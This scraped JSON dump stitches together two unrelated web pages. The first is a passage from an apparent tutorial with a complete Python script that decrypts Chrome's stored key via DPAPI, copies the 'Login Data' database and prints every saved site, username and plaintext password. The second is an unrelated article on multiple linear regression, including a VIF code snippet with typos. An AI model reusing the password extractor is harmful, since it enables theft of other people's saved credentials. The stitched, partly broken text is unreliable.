Users => <Your_Name> => AppData => \n # Local => Google => Chrome => User Data => \n # Local State\n \n local_computer_directory_path = os.path.join(\n os.environ[\"USERPROFILE\"], \"AppData\", \"Local\", \"Google\",\n \"Chrome\", \"User Data\", \"Local State\")\n \n with open(local_computer_directory_path, \"r\", encoding=\"utf-8\") as f:\n local_state_data = f.read()\n local_state_data = json.loads(local_state_data)\n\n # decoding the encryption key using base64\n encryption_key = base64.b64decode(\n local_state_data[\"os_crypt\"][\"encrypted_key\"])\n \n # remove Windows Data Protection API (DPAPI) str\n encryption_key = encryption_key[5:]\n \n # return decrypted key\n return win32crypt.CryptUnprotectData(\n encryption_key, None, None, None, 0)[1]" }, { "code": null, "e": 26239, "s": 25979, "text": "The fetching_encryption_key() function obtains and decodes the AES key used to encrypt the password. It is saved as a JSON file in “C:\\Users\\<Your_PC_Name>\\AppData\\Local\\Google\\Chrome\\User Data\\Local State”. This function will be useful for the encrypted key." 
}, { "code": null, "e": 26254, "s": 26239, "text": "Third Function" }, { "code": null, "e": 26724, "s": 26254, "text": "def password_decryption(password, encryption_key):\n\n try:\n iv = password[3:15]\n password = password[15:]\n \n # generate cipher\n cipher = AES.new(encryption_key, AES.MODE_GCM, iv)\n \n # decrypt password\n return cipher.decrypt(password)[:-16].decode()\n except:\n try:\n return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])\n except:\n return \"No Passwords\"" }, { "code": null, "e": 26877, "s": 26724, "text": "password_decryption() takes the encrypted password and AES key as parameters and returns the decrypted version or Human Readable format of the password." }, { "code": null, "e": 26906, "s": 26877, "text": "Below is the implementation." }, { "code": null, "e": 26914, "s": 26906, "text": "Python3" }, { "code": "import osimport jsonimport base64import sqlite3import win32cryptfrom Cryptodome.Cipher import AESimport shutilfrom datetime import timezone, datetime, timedelta def chrome_date_and_time(chrome_data): # Chrome_data format is 'year-month-date # hr:mins:seconds.milliseconds # This will return datetime.datetime Object return datetime(1601, 1, 1) + timedelta(microseconds=chrome_data) def fetching_encryption_key(): # Local_computer_directory_path will look # like this below # C: => Users => <Your_Name> => AppData => # Local => Google => Chrome => User Data => # Local State local_computer_directory_path = os.path.join( os.environ[\"USERPROFILE\"], \"AppData\", \"Local\", \"Google\", \"Chrome\", \"User Data\", \"Local State\") with open(local_computer_directory_path, \"r\", encoding=\"utf-8\") as f: local_state_data = f.read() local_state_data = json.loads(local_state_data) # decoding the encryption key using base64 encryption_key = base64.b64decode( local_state_data[\"os_crypt\"][\"encrypted_key\"]) # remove Windows Data Protection API (DPAPI) str encryption_key = encryption_key[5:] # return decrypted key return win32crypt.CryptUnprotectData(encryption_key, None, None, None, 0)[1] def password_decryption(password, encryption_key): try: iv = password[3:15] password = password[15:] # generate cipher cipher = AES.new(encryption_key, AES.MODE_GCM, iv) # decrypt password return cipher.decrypt(password)[:-16].decode() except: try: return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1]) except: return \"No Passwords\" def main(): key = fetching_encryption_key() db_path = os.path.join(os.environ[\"USERPROFILE\"], \"AppData\", \"Local\", \"Google\", \"Chrome\", \"User Data\", \"default\", \"Login Data\") filename = \"ChromePasswords.db\" shutil.copyfile(db_path, filename) # connecting to the database db = sqlite3.connect(filename) cursor = db.cursor() # 'logins' table has the data cursor.execute( \"select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins \" \"order by date_last_used\") # iterate over all rows for row in cursor.fetchall(): main_url = row[0] login_page_url = row[1] user_name = row[2] decrypted_password = password_decryption(row[3], key) date_of_creation = row[4] last_usuage = row[5] if user_name or decrypted_password: print(f\"Main URL: {main_url}\") print(f\"Login URL: {login_page_url}\") print(f\"User name: {user_name}\") print(f\"Decrypted Password: {decrypted_password}\") else: continue if date_of_creation != 86400000000 and date_of_creation: print(f\"Creation date: {str(chrome_date_and_time(date_of_creation))}\") if last_usuage != 86400000000 and last_usuage: 
print(f\"Last Used: {str(chrome_date_and_time(last_usuage))}\") print(\"=\" * 100) cursor.close() db.close() try: # trying to remove the copied db file as # well from local computer os.remove(filename) except: pass if __name__ == \"__main__\": main()", "e": 30357, "s": 26914, "text": null }, { "code": null, "e": 30365, "s": 30357, "text": "Output:" }, { "code": null, "e": 30416, "s": 30365, "text": "For the above code, we followed these below steps;" }, { "code": null, "e": 30517, "s": 30416, "text": "First, we use the previously defined function fetching_encryption_key() to obtain the encryption key" }, { "code": null, "e": 30806, "s": 30517, "text": "Then copy the SQLite database in “C:\\Users\\<Your_PC_Name>\\AppData\\Local\\Google\\Chrome\\User Data\\default\\Login Data” where the saved Password data is stored of the current directory and establish a connection with it. This is because the original database file locked when Chrome started. " }, { "code": null, "e": 30928, "s": 30806, "text": "With the help of the cursor object, we will execute the SELECT SQL query from the ‘logins’ table order by date_last_used." }, { "code": null, "e": 31068, "s": 30928, "text": "Traverse all the login rows in a more readable format to obtain the passwords for each password and format date_created and date_last_used." }, { "code": null, "e": 31185, "s": 31068, "text": "Finally, With the help of print statements, we will print all the saved credentials which are extracted from Chrome." }, { "code": null, "e": 31245, "s": 31185, "text": "Delete the copy of the database from the current directory." }, { "code": null, "e": 31252, "s": 31245, "text": "Picked" }, { "code": null, "e": 31259, "s": 31252, "text": "Python" }, { "code": null, "e": 31357, "s": 31259, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 31366, "s": 31357, "text": "Comments" }, { "code": null, "e": 31379, "s": 31366, "text": "Old Comments" }, { "code": null, "e": 31415, "s": 31379, "text": "Box Plot in Python using Matplotlib" }, { "code": null, "e": 31438, "s": 31415, "text": "Bar Plot in Matplotlib" }, { "code": null, "e": 31477, "s": 31438, "text": "Python | Get dictionary keys as a list" }, { "code": null, "e": 31510, "s": 31477, "text": "Python | Convert set into a list" }, { "code": null, "e": 31559, "s": 31510, "text": "Ways to filter Pandas DataFrame by column values" }, { "code": null, "e": 31600, "s": 31559, "text": "Python - Call function from another file" }, { "code": null, "e": 31616, "s": 31600, "text": "loops in python" }, { "code": null, "e": 31667, "s": 31616, "text": "Multithreading in Python | Set 2 (Synchronization)" }, { "code": null, "e": 31699, "s": 31667, "text": "Python Dictionary keys() method" } ]
Super Simple Machine Learning — Multiple Linear Regression Part 1 | by Bernadette Low | Towards Data Science
In this super long post, I cover Multiple Linear Regression describing briefly(lol) how it works and what criteria you need to take note of. So get yourself water and snacks, cause this will take a while. The bulk of the basic concepts were covered in my Simple Linear Regression posts, which can be found here. I had intended to quickly cover MLR in one post, but there’s really too many things to address. Sigh. It’s like when your sister had a baby who was once the sole contributor to all the noise in the house, but then she had a couple more and now all three are contributing to the noise. becomes The multiple linear regression explains the relationship between one continuous dependent variable (y) and two or more independent variables (x1, x2, x3... etc). Note that it says CONTINUOUS dependant variable. Since y is the sum of beta, beta1 x1, beta2 x2 etc etc, the resulting y will be a number, a continuous variable, instead of a “yes”, “no” answer (categorical). For example, with linear regression, I would be trying to find out how much Decibels of noise is being produced, and not if it’s noisy or not (Noisy | Not). To find categorical variables (e.g “yes” or “no”, “1” or “0”), logistic regression would be used. I’ll cover this next time. Datasets to try your code on can be found everywhere. sklearn has toy datasets for different types of algorithms (regression, classification etc) which are great for practice. Kaggle also has real-life datasets. Note that in the wild, when you do encounter a dataset, it is going to be ugly AF. It’s going to have missing values, erroneous entries, wrongly formatted columns, irrelevant variables... and even after cleaning it, maybe your p-values look terrible and your R squared is too low. You’ll need to select good features, try different algorithms, tune your hyperparameters, add a time lag, transform the column’s data.... It’s not that straightforward in real-life to run a model, and that’s why people get paid a lot to do this, so that they can fund their scalp treatment to recover from stress-induced hair loss. Due to the nature of the regression equation, your x variables have to be continuous as well. Thus, you’ll need to look into changing your categorical variables into continuous ones. Continuous variables are simply put, running numbers. Categorical variables are categories. It gets slightly confusing when your categorical variables appear continuous at first. For example, what if there was a column of zip codes or phone numbers? Every zip code represents a unique address and every phone number is just a unique contact number. Increasing/decreasing this number does not have any meaning — they are merely identifiers with no intrinsic numerical value, and hence, are considered categorical. Categorical Variables are also referred to as discrete or qualitative variables. There are 3 types: Nominal : more than 2 types. e.g color Dichotomous: 2 types e.g yes or no Ordinal: more than 2 types, but have a rank/order e.g Below average, Average, Above Average There are several ways to change a categorical data into continuous variables that can be used in regression. The simple solution for dichotomous variables would be to change it into binary — “1” means “yes” and “0” means “no” or vice versa. Your label should start at 0. Nominal and Ordinal variables are slightly more troublesome. Let’s say you have 3 different colours: Red, Blue and Grey. Following the concept above, you label Red as 0, Blue as 1 and Grey as 2. 
The problem with doing this is that it implies that Grey is of a higher level than Red and Blue and Blue is of a higher level that Red, which if you consider all three just colours with equal “value”, none of these colours should be of higher level than the other. “Ranking” with labels would work better for Ordinal variables, since they do have a rank and should be given different weightage. When facing nominal variables that should not have different weightage, one hot encoding is preferred. In order not to give categories that are on an even playing field any unequal values, we use one hot encoding. This is done by creating dummy variables, which means creating more “x”s. These would be fake/dummy variables because they are placeholders for your actual variable and were created by you yourself. It’s easy. For every level your variable is, just create a new x for each level. Wait... What about Grey? If your variable can only be 3 colours, then you should only be using 2 dummy variables. Grey becomes the reference category, in the case that your X(blue) and X(red) are both 0, then by default the variable would be Grey. Does it matter which variable you choose to exclude and use as a reference category? No. But the best practice would be to use the category that happens most often (e.g if 70% of the dataset is grey, then grey would be the reference category). Going back to the column of zip codes, let’s say you have 500 rows of clients, all with their own unique zip codes. Does it make sense to hot encode 500 different zip codes? That’s going to add 500 columns to your dataset, cluttering your model and blessing you with a migraine. It is also absolutely pointless since every zip code is unique. It adds no insight to your model because how would you use such information to predict an outcome on new data? If you need to predict the income level of someone living at zip code 323348, how the heck would your model handle that if no such zip code was in your dataset? It has never seen this zip code before and cannot tell you anything about it. What you can do is to transform it into something that you could be used to classify future data, such as grouping these zip codes by their areas (this data would not be in the dataset but needs to be from domain knowledge or research). So instead of 500 different zip codes, you get 4 regions, North, South, East or West (OR depending on how specific you want to get, it could be actual areas like Hougang, Yishun, Bedok, Orchard etc. these are names of areas in Singapore). That means if new data comes in where you need to predict the outcome, you can predict the y based on which area the new zip code falls into. One thing to always keep in mind is not to label blindly. It has to make sense. For example, when encoding ordinal variables (categorical variables with rank), you must ensure that the rank value corresponds to the actual significance of each rank (which can also be seen as its relationship with the dependant variable). 
For example, if you are selling a house, and y = price, while one of the x variables is the floor the apartment is on, encoding the floors as integers make sense if the floors increase in price as it increases in level: However, if the value does not increase accordingly, perhaps one hot encoding and combining the levels would be more appropriate: Or Or if you have no idea what the relationship is: Always ensure that no matter how you transform your categorical variables, make sure you look back at it and ask yourself “does that make sense?” Sometimes there is no right answer, so the question then becomes “does that make more sense?” which might potentially become, “but what makes any sense?” and lead into “what is sense?” which becomes “what is?” and then segue into a week spent in existential nihilism. Bottom line is: Know Thy Data Having too many variables could potentially cause your model to become less accurate, especially if certain variables have no effect on the outcome or have a significant effect on other variables. Let’s take for example the 3 babies screaming. If I were to model my regression equation to find out the decibels of noise being produced based on these 4 variables = baby 1, baby 2, baby 3, lamp (on or off) , it would not be a good model. This is because my spidey senses are telling me that a lamp should not contribute to noise, so any possible correlation between lamp and noise would be spurious and inaccurate. Basic step of Feature Selection: Use your Common and/or Business Sense(s) One other way to select features is to use the p-values. As we last discussed, p-values tell you how statistically significant the variable is. Removing variables with high p-values can cause your accuracy/R squared to increase, and even the p-values of the other variables to increase as well — and that’s a good sign. This action of omitting variables is part of stepwise regression. There are 3 ways to do this: Forward Selection: Start with 0. Run the model over and over, trying each variable. Find the variable that gives the best metric (E.g p-values, Adjusted R-squared, SSE, % accuracy) and stick with it. Run model again with the chosen variable, trying one of the remaining variables at each time and sticking with the best one. Repeat process until the adding does not improve the model any more. Backward Elimination: Start with all variables. Try model out multiple times, excluding one variable at each time. Remove variable that causes the model to improve the most when it is left out. Repeat process without the removed variable, until the metric(s) you are judging on can no longer improve. Bidirectional Elimination: Do a forward selection, but then do backward eliminations as well at some stages. So you can be at a stage where you’ve added X1, X2, X5 and X8, then do elimination by taking out X2. This is a good example. There are R and Python packages created by amazing people that automate these processes to choose the “best model” based on a particular metric (e.g adjusted R Squared or AIC or p-values).Here are some I found. NOTE: Stepwise regression is a quick and fast way to get better scoring models, especially when you’re running simple models. It’s widely used, but also widely criticised as being inaccurate. I’ve always been taught to use stepwise, so I would love to hear your opinions about it. An alternative to stepwise regression would be the LASSO (Least Absolute Shrinkage and Selection Operator) method, which I will cover next time. Or you can read about it here. 
Checking for collinearity helps you get rid of variables that are skewing your data by having a significant relationship with another variable. Correlation between variables describe the relationship between two variables. If they are extremely correlated, then they are collinear. Autocorrelation occurs when a variable’s data affects another instance of that same variable (same column, different row). Linear regression only works if there is little or no autocorrelation in the dataset, and each instance is independent of each other. If instances are autocorrelated then your residuals are not independent from each other, and will show a pattern. This usually occurs in time series datasets, so I will go into more details when I cover Time Series Regression. Multicollinearity exists when two or more of the predictors (x variables) in a regression model are moderately or highly correlated (different column). When one of our predictors is able to strongly predict another predictor or have weird relationships with each other (maybe x2 = x3 or x2 = 2(x3) + x4), then your regression equation is going to be a mess. Why is multicollinearity an issue with regression? Well, the regression equation is the best fit line to represent the effects of your predictors and the dependant variable, and does not include the effects of one predictor on another. Having high collinearity (correlation of 1.00) between predictors will affect your coefficients and the accuracy, plus its ability to reduce the SSE (sum of squared errors — that thing you need to minimise with your regression). The simplest method to detect collinearity would be to plot it out in graphs or to view a correlation matrix to check out pairwise correlation (correlation between 2 variables). If you have two variables that are highly correlated, your best course of action is to just remove one of them. When your coefficient (the b in bx) is negative, but you know from common sense and business knowledge that the effect of the variable should be positive. Or when the coefficient is too small for a variable that should have a bigger effect.When you run one model with that x variable and you run another without that x variable, and the coefficients for these models are drastically different.When the t-tests for each of the individual slopes are non-significant, but the overall F-test is significant. This is because multicollinearity causes some variables to seem useless, so lowering the t-stat, but has no effect on the F-statistics which takes an overall view.When your VIF is off the charts is 5 or more When your coefficient (the b in bx) is negative, but you know from common sense and business knowledge that the effect of the variable should be positive. Or when the coefficient is too small for a variable that should have a bigger effect. When you run one model with that x variable and you run another without that x variable, and the coefficients for these models are drastically different. When the t-tests for each of the individual slopes are non-significant, but the overall F-test is significant. This is because multicollinearity causes some variables to seem useless, so lowering the t-stat, but has no effect on the F-statistics which takes an overall view. When your VIF is off the charts is 5 or more VIF : Variance Inflation Factor VIF is a measure of how much the variance of the coefficient derived from the model is inflated by collinearity. 
It helps detect multicollinearity that you cannot catch just by eyeballing a pairwise correlation plot and even detects strong relations between 3 variables and more. It is calculated by taking the ratio of [the variance of all of the coefficients] divided by [the variance of that one variable’s coefficient when it is the only variable in the model]. VIF = 1 : no correlation between that predictor and the other variables VIF = 4 : Suspicious, needs to be looked into VIF = 5-10 : “Houston, we have a problem.” Look into it or drop the variable. Finding VIF in Python:from statsmodels.stats.outliers_influence import variance_inflation_factory, X = dmatrices('y ~ x1 + x2', dataset, return_type='dataframe')vif_df = pd.Dataframe()vif_df["vif"] = [variance_inflation_factor(X.values, i) for i in range(X.shape[1])]vif_df["features"] = X.columnsprint(vif_df)Finding VIF in R reg <- lm(y ~ x1+x2,x3, data=dataset) summary(reg) VIF(lm(x1 ~ x2+x3, data=dataset)) VIF(lm(x2 ~ x1+x3, data=dataset)) VIF(lm(x3 ~ x2+x1, data=dataset)) We learnt about R Squared in the last post. To recap, it measures how well the regression line fits with the actual results. Let’s dive deeper. Its formula is: R-squared = Explained variation / Total variation Explained Variance = Sum of Squares due to Regression (SSR) [do no confuse with RSS (Residual Sum of Squares) which is also called SSE] Sum of Squares Total (SST) = SSR + SSE (Sum of Squared Errors) You can look at it as SSE being the “Unexplained Variation”. Remember that SSE is the errors between your actual (y) and your predicted (y-hat) Total Variation = SST (Sum of Squares Total). The average squared difference between Each Variable and the Overall Mean of the Variable ( y- ybar). So R-squared essentially looks like this: Now that that’s clarified, let’s check out Adjusted R-Squared. Because your numerator is the SUM of variances, adding more predictors (x variables) will always increase the R-squared, making it inaccurate as the predictors increase. The adjusted R-squared on the other hand, accounts for the increase in number of predictors. n refers to the number of data points (E.g rows in your dataset) k refers to the number of x variables Because of the nature of the equation, the Adjusted R-Squared should always be lower than or equal the R-Squared. A good way to use Adjusted R square is to perhaps run a few iterations of the model with different variables (e.g do a stepwise regression). You can see how the adjusted R squared increases and maybe hits an optimal point before decreasing when more variables are added. You should then keep it at those variables that gave you the optimal adjust R squared. Any variables that are able to predict the outcome variable significantly, and thus improve your accuracy, will lead to a higher Adjusted R-Squared. Take a breather. Congrats on reaching the end of this post! The next one will cover the actual modelling using gretl and python, and more ways of checking accuracy. Till next time!
[ { "code": null, "e": 377, "s": 172, "text": "In this super long post, I cover Multiple Linear Regression describing briefly(lol) how it works and what criteria you need to take note of. So get yourself water and snacks, cause this will take a while." }, { "code": null, "e": 586, "s": 377, "text": "The bulk of the basic concepts were covered in my Simple Linear Regression posts, which can be found here. I had intended to quickly cover MLR in one post, but there’s really too many things to address. Sigh." }, { "code": null, "e": 769, "s": 586, "text": "It’s like when your sister had a baby who was once the sole contributor to all the noise in the house, but then she had a couple more and now all three are contributing to the noise." }, { "code": null, "e": 777, "s": 769, "text": "becomes" }, { "code": null, "e": 939, "s": 777, "text": "The multiple linear regression explains the relationship between one continuous dependent variable (y) and two or more independent variables (x1, x2, x3... etc)." }, { "code": null, "e": 1148, "s": 939, "text": "Note that it says CONTINUOUS dependant variable. Since y is the sum of beta, beta1 x1, beta2 x2 etc etc, the resulting y will be a number, a continuous variable, instead of a “yes”, “no” answer (categorical)." }, { "code": null, "e": 1305, "s": 1148, "text": "For example, with linear regression, I would be trying to find out how much Decibels of noise is being produced, and not if it’s noisy or not (Noisy | Not)." }, { "code": null, "e": 1430, "s": 1305, "text": "To find categorical variables (e.g “yes” or “no”, “1” or “0”), logistic regression would be used. I’ll cover this next time." }, { "code": null, "e": 1484, "s": 1430, "text": "Datasets to try your code on can be found everywhere." }, { "code": null, "e": 1642, "s": 1484, "text": "sklearn has toy datasets for different types of algorithms (regression, classification etc) which are great for practice. Kaggle also has real-life datasets." }, { "code": null, "e": 2061, "s": 1642, "text": "Note that in the wild, when you do encounter a dataset, it is going to be ugly AF. It’s going to have missing values, erroneous entries, wrongly formatted columns, irrelevant variables... and even after cleaning it, maybe your p-values look terrible and your R squared is too low. You’ll need to select good features, try different algorithms, tune your hyperparameters, add a time lag, transform the column’s data...." }, { "code": null, "e": 2255, "s": 2061, "text": "It’s not that straightforward in real-life to run a model, and that’s why people get paid a lot to do this, so that they can fund their scalp treatment to recover from stress-induced hair loss." }, { "code": null, "e": 2438, "s": 2255, "text": "Due to the nature of the regression equation, your x variables have to be continuous as well. Thus, you’ll need to look into changing your categorical variables into continuous ones." }, { "code": null, "e": 2530, "s": 2438, "text": "Continuous variables are simply put, running numbers. Categorical variables are categories." }, { "code": null, "e": 2617, "s": 2530, "text": "It gets slightly confusing when your categorical variables appear continuous at first." }, { "code": null, "e": 2688, "s": 2617, "text": "For example, what if there was a column of zip codes or phone numbers?" }, { "code": null, "e": 2951, "s": 2688, "text": "Every zip code represents a unique address and every phone number is just a unique contact number. 
Increasing/decreasing this number does not have any meaning — they are merely identifiers with no intrinsic numerical value, and hence, are considered categorical." }, { "code": null, "e": 3051, "s": 2951, "text": "Categorical Variables are also referred to as discrete or qualitative variables. There are 3 types:" }, { "code": null, "e": 3090, "s": 3051, "text": "Nominal : more than 2 types. e.g color" }, { "code": null, "e": 3125, "s": 3090, "text": "Dichotomous: 2 types e.g yes or no" }, { "code": null, "e": 3217, "s": 3125, "text": "Ordinal: more than 2 types, but have a rank/order e.g Below average, Average, Above Average" }, { "code": null, "e": 3327, "s": 3217, "text": "There are several ways to change a categorical data into continuous variables that can be used in regression." }, { "code": null, "e": 3489, "s": 3327, "text": "The simple solution for dichotomous variables would be to change it into binary — “1” means “yes” and “0” means “no” or vice versa. Your label should start at 0." }, { "code": null, "e": 3550, "s": 3489, "text": "Nominal and Ordinal variables are slightly more troublesome." }, { "code": null, "e": 3684, "s": 3550, "text": "Let’s say you have 3 different colours: Red, Blue and Grey. Following the concept above, you label Red as 0, Blue as 1 and Grey as 2." }, { "code": null, "e": 3949, "s": 3684, "text": "The problem with doing this is that it implies that Grey is of a higher level than Red and Blue and Blue is of a higher level that Red, which if you consider all three just colours with equal “value”, none of these colours should be of higher level than the other." }, { "code": null, "e": 4079, "s": 3949, "text": "“Ranking” with labels would work better for Ordinal variables, since they do have a rank and should be given different weightage." }, { "code": null, "e": 4182, "s": 4079, "text": "When facing nominal variables that should not have different weightage, one hot encoding is preferred." }, { "code": null, "e": 4492, "s": 4182, "text": "In order not to give categories that are on an even playing field any unequal values, we use one hot encoding. This is done by creating dummy variables, which means creating more “x”s. These would be fake/dummy variables because they are placeholders for your actual variable and were created by you yourself." }, { "code": null, "e": 4573, "s": 4492, "text": "It’s easy. For every level your variable is, just create a new x for each level." }, { "code": null, "e": 4598, "s": 4573, "text": "Wait... What about Grey?" }, { "code": null, "e": 4821, "s": 4598, "text": "If your variable can only be 3 colours, then you should only be using 2 dummy variables. Grey becomes the reference category, in the case that your X(blue) and X(red) are both 0, then by default the variable would be Grey." }, { "code": null, "e": 4906, "s": 4821, "text": "Does it matter which variable you choose to exclude and use as a reference category?" }, { "code": null, "e": 5065, "s": 4906, "text": "No. But the best practice would be to use the category that happens most often (e.g if 70% of the dataset is grey, then grey would be the reference category)." }, { "code": null, "e": 5239, "s": 5065, "text": "Going back to the column of zip codes, let’s say you have 500 rows of clients, all with their own unique zip codes. Does it make sense to hot encode 500 different zip codes?" }, { "code": null, "e": 5344, "s": 5239, "text": "That’s going to add 500 columns to your dataset, cluttering your model and blessing you with a migraine." 
}, { "code": null, "e": 5758, "s": 5344, "text": "It is also absolutely pointless since every zip code is unique. It adds no insight to your model because how would you use such information to predict an outcome on new data? If you need to predict the income level of someone living at zip code 323348, how the heck would your model handle that if no such zip code was in your dataset? It has never seen this zip code before and cannot tell you anything about it." }, { "code": null, "e": 5995, "s": 5758, "text": "What you can do is to transform it into something that you could be used to classify future data, such as grouping these zip codes by their areas (this data would not be in the dataset but needs to be from domain knowledge or research)." }, { "code": null, "e": 6234, "s": 5995, "text": "So instead of 500 different zip codes, you get 4 regions, North, South, East or West (OR depending on how specific you want to get, it could be actual areas like Hougang, Yishun, Bedok, Orchard etc. these are names of areas in Singapore)." }, { "code": null, "e": 6376, "s": 6234, "text": "That means if new data comes in where you need to predict the outcome, you can predict the y based on which area the new zip code falls into." }, { "code": null, "e": 6434, "s": 6376, "text": "One thing to always keep in mind is not to label blindly." }, { "code": null, "e": 6456, "s": 6434, "text": "It has to make sense." }, { "code": null, "e": 6698, "s": 6456, "text": "For example, when encoding ordinal variables (categorical variables with rank), you must ensure that the rank value corresponds to the actual significance of each rank (which can also be seen as its relationship with the dependant variable)." }, { "code": null, "e": 6918, "s": 6698, "text": "For example, if you are selling a house, and y = price, while one of the x variables is the floor the apartment is on, encoding the floors as integers make sense if the floors increase in price as it increases in level:" }, { "code": null, "e": 7048, "s": 6918, "text": "However, if the value does not increase accordingly, perhaps one hot encoding and combining the levels would be more appropriate:" }, { "code": null, "e": 7051, "s": 7048, "text": "Or" }, { "code": null, "e": 7100, "s": 7051, "text": "Or if you have no idea what the relationship is:" }, { "code": null, "e": 7246, "s": 7100, "text": "Always ensure that no matter how you transform your categorical variables, make sure you look back at it and ask yourself “does that make sense?”" }, { "code": null, "e": 7340, "s": 7246, "text": "Sometimes there is no right answer, so the question then becomes “does that make more sense?”" }, { "code": null, "e": 7514, "s": 7340, "text": "which might potentially become, “but what makes any sense?” and lead into “what is sense?” which becomes “what is?” and then segue into a week spent in existential nihilism." }, { "code": null, "e": 7544, "s": 7514, "text": "Bottom line is: Know Thy Data" }, { "code": null, "e": 7741, "s": 7544, "text": "Having too many variables could potentially cause your model to become less accurate, especially if certain variables have no effect on the outcome or have a significant effect on other variables." }, { "code": null, "e": 8158, "s": 7741, "text": "Let’s take for example the 3 babies screaming. If I were to model my regression equation to find out the decibels of noise being produced based on these 4 variables = baby 1, baby 2, baby 3, lamp (on or off) , it would not be a good model. 
This is because my spidey senses are telling me that a lamp should not contribute to noise, so any possible correlation between lamp and noise would be spurious and inaccurate." }, { "code": null, "e": 8232, "s": 8158, "text": "Basic step of Feature Selection: Use your Common and/or Business Sense(s)" }, { "code": null, "e": 8552, "s": 8232, "text": "One other way to select features is to use the p-values. As we last discussed, p-values tell you how statistically significant the variable is. Removing variables with high p-values can cause your accuracy/R squared to increase, and even the p-values of the other variables to improve (decrease) as well — and that’s a good sign." }, { "code": null, "e": 8647, "s": 8552, "text": "This action of omitting variables is part of stepwise regression. There are 3 ways to do this (a small sketch of forward selection follows after this section):" }, { "code": null, "e": 9041, "s": 8647, "text": "Forward Selection: Start with 0. Run the model over and over, trying each variable. Find the variable that gives the best metric (E.g p-values, Adjusted R-squared, SSE, % accuracy) and stick with it. Run the model again with the chosen variable, trying one of the remaining variables each time and sticking with the best one. Repeat the process until adding does not improve the model any more." }, { "code": null, "e": 9342, "s": 9041, "text": "Backward Elimination: Start with all variables. Try the model out multiple times, excluding one variable each time. Remove the variable that causes the model to improve the most when it is left out. Repeat the process without the removed variable, until the metric(s) you are judging on can no longer improve." }, { "code": null, "e": 9576, "s": 9342, "text": "Bidirectional Elimination: Do a forward selection, but then do backward eliminations as well at some stages. So you can be at a stage where you’ve added X1, X2, X5 and X8, then do elimination by taking out X2. This is a good example." }, { "code": null, "e": 9787, "s": 9576, "text": "There are R and Python packages created by amazing people that automate these processes to choose the “best model” based on a particular metric (e.g adjusted R Squared or AIC or p-values). Here are some I found." }, { "code": null, "e": 10068, "s": 9787, "text": "NOTE: Stepwise regression is a quick way to get better scoring models, especially when you’re running simple models. It’s widely used, but also widely criticised as being inaccurate. I’ve always been taught to use stepwise, so I would love to hear your opinions about it." }, { "code": null, "e": 10244, "s": 10068, "text": "An alternative to stepwise regression would be the LASSO (Least Absolute Shrinkage and Selection Operator) method, which I will cover next time. Or you can read about it here." }, { "code": null, "e": 10388, "s": 10244, "text": "Checking for collinearity helps you get rid of variables that are skewing your data by having a significant relationship with another variable." }, { "code": null, "e": 10526, "s": 10388, "text": "Correlation between variables describes the relationship between two variables. If they are extremely correlated, then they are collinear." }, { "code": null, "e": 11010, "s": 10526, "text": "Autocorrelation occurs when a variable’s data affects another instance of that same variable (same column, different row). Linear regression only works if there is little or no autocorrelation in the dataset, and each instance is independent of each other. If instances are autocorrelated then your residuals are not independent of each other, and will show a pattern. 
This usually occurs in time series datasets, so I will go into more details when I cover Time Series Regression." }, { "code": null, "e": 11368, "s": 11010, "text": "Multicollinearity exists when two or more of the predictors (x variables) in a regression model are moderately or highly correlated (different column). When one of our predictors is able to strongly predict another predictor, or predictors have weird relationships with each other (maybe x2 = x3 or x2 = 2(x3) + x4), then your regression equation is going to be a mess." }, { "code": null, "e": 11604, "s": 11368, "text": "Why is multicollinearity an issue with regression? Well, the regression equation is the best fit line representing the effects of your predictors on the dependent variable, and it does not include the effects of one predictor on another." }, { "code": null, "e": 11833, "s": 11604, "text": "Having high collinearity (correlation of 1.00) between predictors will affect your coefficients and the accuracy, plus its ability to reduce the SSE (sum of squared errors — that thing you need to minimise with your regression)." }, { "code": null, "e": 12011, "s": 11833, "text": "The simplest method to detect collinearity would be to plot it out in graphs or to view a correlation matrix to check out pairwise correlation (correlation between 2 variables); a short pandas sketch of this check follows after this section." }, { "code": null, "e": 12123, "s": 12011, "text": "If you have two variables that are highly correlated, your best course of action is to just remove one of them." }, { "code": null, "e": 12835, "s": 12123, "text": "A few signs that multicollinearity is present:" }, { "code": null, "e": 13076, "s": 12835, "text": "When your coefficient (the b in bx) is negative, but you know from common sense and business knowledge that the effect of the variable should be positive. Or when the coefficient is too small for a variable that should have a bigger effect." }, { "code": null, "e": 13230, "s": 13076, "text": "When you run one model with that x variable and you run another without that x variable, and the coefficients for these models are drastically different." }, { "code": null, "e": 13505, "s": 13230, "text": "When the t-tests for each of the individual slopes are non-significant, but the overall F-test is significant. This is because multicollinearity causes some variables to seem useless, thus lowering their t-stats, but has no effect on the F-statistic, which takes an overall view." }, { "code": null, "e": 13550, "s": 13505, "text": "When your VIF is off the charts (5 or more)" }, { "code": null, "e": 13582, "s": 13550, "text": "VIF: Variance Inflation Factor" }, { "code": null, "e": 13862, "s": 13582, "text": "VIF is a measure of how much the variance of the coefficient derived from the model is inflated by collinearity. 
It helps detect multicollinearity that you cannot catch just by eyeballing a pairwise correlation plot and even detects strong relations between 3 variables and more." }, { "code": null, "e": 14048, "s": 13862, "text": "It is calculated, for each predictor, by taking the ratio of [the variance of that predictor’s coefficient in the full model with all predictors] divided by [the variance of its coefficient when it is the only variable in the model]." }, { "code": null, "e": 14120, "s": 14048, "text": "VIF = 1 : no correlation between that predictor and the other variables" }, { "code": null, "e": 14166, "s": 14120, "text": "VIF = 4 : Suspicious, needs to be looked into" }, { "code": null, "e": 14244, "s": 14166, "text": "VIF = 5-10 : “Houston, we have a problem.” Look into it or drop the variable." }, { "code": null, "e": 14725, "s": 14244, "text": "Finding VIF in Python:\nimport pandas as pd\nfrom patsy import dmatrices\nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\ny, X = dmatrices('y ~ x1 + x2', dataset, return_type='dataframe')\nvif_df = pd.DataFrame()\nvif_df[\"vif\"] = [variance_inflation_factor(X.values, i) for i in range(X.shape[1])]\nvif_df[\"features\"] = X.columns\nprint(vif_df)\nFinding VIF in R:\nreg <- lm(y ~ x1+x2+x3, data=dataset)\nsummary(reg)\nVIF(lm(x1 ~ x2+x3, data=dataset))\nVIF(lm(x2 ~ x1+x3, data=dataset))\nVIF(lm(x3 ~ x2+x1, data=dataset))" }, { "code": null, "e": 14869, "s": 14725, "text": "We learnt about R Squared in the last post. To recap, it 